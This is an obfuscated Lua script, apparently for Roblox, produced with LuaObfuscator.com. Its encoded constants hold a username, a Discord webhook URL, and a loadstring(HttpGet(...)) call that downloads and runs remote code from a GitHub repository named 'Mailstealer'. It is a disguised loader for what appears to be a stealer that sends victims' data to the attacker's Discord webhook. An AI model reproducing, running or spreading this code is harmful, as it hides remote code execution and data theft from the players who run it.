--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.15) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v88=v5(v82,v19);v19=nil;return v88;else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=(v31/(2^(v32-(2 -1))))%((5 -3)^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v83-(v83%(932 -(857 + 74))) ;else local v84=568 -(367 + (1838 -(1523 + 114))) ;local v85;while true do if (v84==(927 -(214 + 713))) then v85=(1 + 1)^(v32-(1 + 0 + 0)) ;return (((v31%(v85 + v85))>=v85) and (878 -(282 + (847 -252)))) or 0 ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=(0 -0) + 0 ;local v36;local v37;while true do if (v35==(1066 -(68 + 997))) then return (v37 * (1526 -(226 + 1044))) + v36 ;end if (v35==(0 -0)) then v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + (119 -((382 -(87 + 263)) + 85)) ;v35=1 + 0 ;end end end local function v23()local v38=180 -(67 + 113) ;local v39;local v40;local v41;local v42;while true do if (v38==(1 + 0)) then return (v42 * (41190819 -24413603)) + (v41 * (48199 + 17337)) + (v40 * (1017 -761)) + v39 ;end if (v38==((1949 -(915 + 82)) -(802 + 150))) then v39,v40,v41,v42=v1(v16,v18,v18 + (7 -4) );v18=v18 + (6 -2) ;v38=1 + (0 -0) ;end end end local function v24()local v43=v23();local v44=v23();local v45=1 -(885 -(261 + 624)) ;local v46=(v20(v44,(1 -0) + 0 ,458 -(145 + (1373 -(1020 + 60))) ) * ((2 -0)^(462 -((1467 -(630 + 793)) + 386)))) + v43 ;local v47=v20(v44,1208 -(1069 + 118) ,70 -39 );local v48=((v20(v44,69 -37 )==1) and  -(1 + 0)) or (1 -0) ;if (v47==((0 -0) + 0)) then if (v46==(791 -(368 + 423))) then return v48 * (0 + 0) ;else v47=3 -(9 -7) ;v45=0 -0 ;end elseif (v47==(2906 -(814 + 45))) then return ((v46==(18 -(4 + 6 + (27 -19)))) and (v48 * ((3 -(1749 -(760 + 987)))/0))) or (v48 * NaN) ;end return v8(v48,v47-(1465 -(416 + (1939 -(1789 + 124)))) ) * (v45 + (v46/((6 -4)^((789 -(745 + 21)) + 29)))) ;end local function v25(v49)local v50=0 + 0 ;local v51;local v52;while true do if (v50==(2 -1)) then v51=v3(v16,v18,(v18 + v49) -(3 -2) );v18=v18 + v49 ;v50=1 + 1 ;end if (v50==(2 + 0)) then v52={};for v89=(2873 -(1703 + 114)) -(87 + 968) , #v51 do v52[v89]=v2(v1(v3(v51,v89,v89)));end v50=13 -10 ;end if (v50==(0 + 0)) then v51=nil;if  not v49 then local v95=0;while true do if (v95==0) then v49=v23();if (v49==(0 -0)) then return "";end break;end end end v50=(2115 -(376 + 325)) -(447 + (1582 -616)) ;end if (v50==(8 -5)) then return v6(v52);end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v53==(0 -0)) then v54=0 -0 ;v55=nil;v53=1 + 0 ;end if (v53==(1639 -(1373 + 263))) then v60=nil;v61=nil;v53=1004 -(451 + 549) ;end if (v53==2) then v58=nil;v59=nil;v53=1 + 2 ;end if (4~=v53) then else while true do if ((1 -0)==v54) then local v98=0;while true do if (0==v98) then v57=nil;v58=nil;v98=1 -0 ;end if (v98==1) then v54=2;break;end end end if ((1386 -(746 + 638))==v54) then local v99=0 + 0 ;while true do if (v99~=(1 -0)) then else v54=344 -(218 + 123) ;break;end if (v99==(1581 -(1535 + 46))) then v59=nil;v60=nil;v99=1;end end end if (v54~=0) then else v55=0;v56=nil;v54=1;end if (v54==3) then v61=nil;while true do if (v55~=0) then else local v100=0 + 0 ;while true do if (v100~=0) then else v56={};v57={};v100=1;end if (v100==(1 + 1)) then v55=561 -(306 + 254) ;break;end if (v100==(1 + 0)) then local v103=0;while true do if (v103==(1 -0)) then v100=1469 -(899 + 568) ;break;end if (v103~=0) then else v58={};v59={v56,v57,nil,v58};v103=604 -(268 + 335) ;end end end end end if (v55==2) then local v101=290 -(60 + 230) ;while true do if (v101==(573 -(426 + 146))) then return v59;end if ((0 + 0)==v101) then for v105=1,v23() do local v106=0;local v107;local v108;local v109;while true do if (v106~=0) then else v107=0;v108=nil;v106=1457 -(282 + 1174) ;end if (v106==1) then v109=nil;while true do if (v107~=0) then else local v171=0;local v172;while true do if (v171==(811 -(569 + 242))) then v172=0;while true do if (1==v172) then v107=1;break;end if (v172==(0 -0)) then local v180=0;while true do if (v180~=1) then else v172=1 + 0 ;break;end if (v180~=0) then else v108=0;v109=nil;v180=1025 -(706 + 318) ;end end end end break;end end end if (v107~=1) then else while true do if (v108==(1251 -(721 + 530))) then v109=v21();if (v20(v109,1,1272 -(945 + 326) )==0) then local v174=0 -0 ;local v175;local v176;local v177;local v178;local v179;while true do if (1==v174) then v177=nil;v178=nil;v174=2 + 0 ;end if (v174~=(700 -(271 + 429))) then else v175=0;v176=nil;v174=1 + 0 ;end if ((1502 -(1408 + 92))~=v174) then else v179=nil;while true do if (v175~=(1087 -(461 + 625))) then else v178=nil;v179=nil;v175=1290 -(993 + 295) ;end if (v175==(0 + 0)) then v176=1171 -(418 + 753) ;v177=nil;v175=1;end if (v175~=(1 + 1)) then else while true do if (v176==0) then v177=v20(v109,2,3);v178=v20(v109,1 + 3 ,2 + 4 );v176=1 + 0 ;end if (v176==2) then local v181=529 -(406 + 123) ;while true do if (v181~=(1770 -(1749 + 20))) then else v176=3;break;end if ((0 + 0)~=v181) then else if (v20(v178,1323 -(1249 + 73) ,1)==1) then v179[1 + 1 ]=v61[v179[1147 -(466 + 679) ]];end if (v20(v178,2,4 -2 )==1) then v179[8 -5 ]=v61[v179[1903 -(106 + 1794) ]];end v181=1;end end end if (v176==(1 + 0)) then local v182=0;while true do if (v182==(1 + 0)) then v176=2;break;end if (0==v182) then local v186=0 -0 ;while true do if (0==v186) then v179={v22(),v22(),nil,nil};if (v177==0) then local v191=1427 -(41 + 1386) ;while true do if (v191~=0) then else v179[106 -(17 + 86) ]=v22();v179[3 + 1 ]=v22();break;end end elseif (v177==(1 -0)) then v179[8 -5 ]=v23();elseif (v177==(168 -(122 + 44))) then v179[5 -2 ]=v23() -(2^(52 -36)) ;elseif (v177==(3 + 0)) then local v196=0;local v197;while true do if (v196==0) then v197=0 + 0 ;while true do if (0~=v197) then else v179[5 -2 ]=v23() -(2^16) ;v179[69 -(30 + 35) ]=v22();break;end end break;end end end v186=1 + 0 ;end if (v186~=1) then else v182=1258 -(1043 + 214) ;break;end end end end end if (v176==(11 -8)) then if (v20(v178,3,3)~=1) then else v179[4]=v61[v179[4]];end v56[v105]=v179;break;end end break;end end break;end end end break;end end break;end end break;end end end for v110=1213 -(323 + 889) ,v23() do v57[v110-(2 -1) ]=v28();end v101=581 -(361 + 219) ;end end end if (v55==(321 -(53 + 267))) then local v102=0;while true do if (v102==1) then for v112=1,v60 do local v113=0 + 0 ;local v114;local v115;local v116;while true do if (v113~=1) then else v116=nil;while true do if (v114==1) then if (v115==(414 -(15 + 398))) then v116=v21()~=(982 -(18 + 964)) ;elseif (v115==2) then v116=v24();elseif (v115~=(11 -8)) then else v116=v25();end v61[v112]=v116;break;end if (0~=v114) then else v115=v21();v116=nil;v114=1 + 0 ;end end break;end if (v113==0) then v114=0 + 0 ;v115=nil;v113=1;end end end v59[3]=v21();v102=852 -(20 + 830) ;end if (v102==(2 + 0)) then v55=128 -(116 + 10) ;break;end if (0==v102) then v60=v23();v61={};v102=1 + 0 ;end end end end break;end end break;end if (v53==1) then v56=nil;v57=nil;v53=2;end end end local function v29(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v68=v65;local v69=v66;local v70=v67;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v86=0,v76 do if (v86>=v70) then v74[v86-v70 ]=v75[v86 + 1 ];else v78[v86]=v75[v86 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v87=0;while true do if (v87==0) then v80=v68[v72];v81=v80[1];v87=1;end if (v87==1) then if (v81<=9) then if (v81<=4) then if (v81<=1) then if (v81==0) then local v117=0;local v118;while true do if (v117==0) then v118=v80[2];v78[v118]=v78[v118](v13(v78,v118 + 1 ,v73));break;end end else local v119=0;local v120;local v121;while true do if (v119==0) then v120=v80[2];v121=v78[v80[3]];v119=1;end if (1==v119) then v78[v120 + 1 ]=v121;v78[v120]=v121[v80[4]];break;end end end elseif (v81<=2) then local v122=v80[2];local v123,v124=v71(v78[v122](v13(v78,v122 + 1 ,v80[3])));v73=(v124 + v122) -1 ;local v125=0;for v143=v122,v73 do v125=v125 + 1 ;v78[v143]=v123[v125];end elseif (v81==3) then do return;end else v78[v80[2]]();end elseif (v81<=6) then if (v81>5) then v64[v80[3]]=v78[v80[2]];else local v128=v80[2];local v129,v130=v71(v78[v128](v13(v78,v128 + 1 ,v80[3])));v73=(v130 + v128) -1 ;local v131=0;for v146=v128,v73 do v131=v131 + 1 ;v78[v146]=v129[v131];end end elseif (v81<=7) then v78[v80[2]]=v80[3];elseif (v81>8) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end else do return;end end elseif (v81<=14) then if (v81<=11) then if (v81>10) then v72=v80[3];else v78[v80[2]]=v64[v80[3]];end elseif (v81<=12) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81==13) then v78[v80[2]]=v80[3];else v78[v80[2]]();end elseif (v81<=16) then if (v81>15) then local v137=0;local v138;while true do if (v137==0) then v138=v80[2];v78[v138]=v78[v138](v13(v78,v138 + 1 ,v73));break;end end else v64[v80[3]]=v78[v80[2]];end elseif (v81<=17) then v78[v80[2]]=v64[v80[3]];elseif (v81==18) then local v152=0;local v153;local v154;while true do if (v152==0) then v153=v80[2];v154=v78[v80[3]];v152=1;end if (v152==1) then v78[v153 + 1 ]=v154;v78[v153]=v154[v80[4]];break;end end else v72=v80[3];end v72=v72 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D6532030B3O006C6F756B616C6F73323031030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F45676F72696B7573612F4D61696C737465616C65722F6D61696E2F656E67696E6503083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313433322O303331323436373931383933302F366E70584B3267326C524A4D6C624668706A37775350414C5F54337735743141717A747643576F4E5149506C6B446C4E42366461766C442D396C6E486741616E735A6B4800163O00120D3O00013O0026093O000D000100020004133O000D000100120D000100043O00120F000100033O00120A000100053O00120A000200063O00200100020002000700120D000400084O0002000200044O001000013O00022O000E0001000100010004133O001500010026093O0001000100010004133O0001000100120D000100043O00120F000100093O00120D0001000B3O00120F0001000A3O00120D3O00023O0004133O000100012O00083O00017O00",v9(),...);
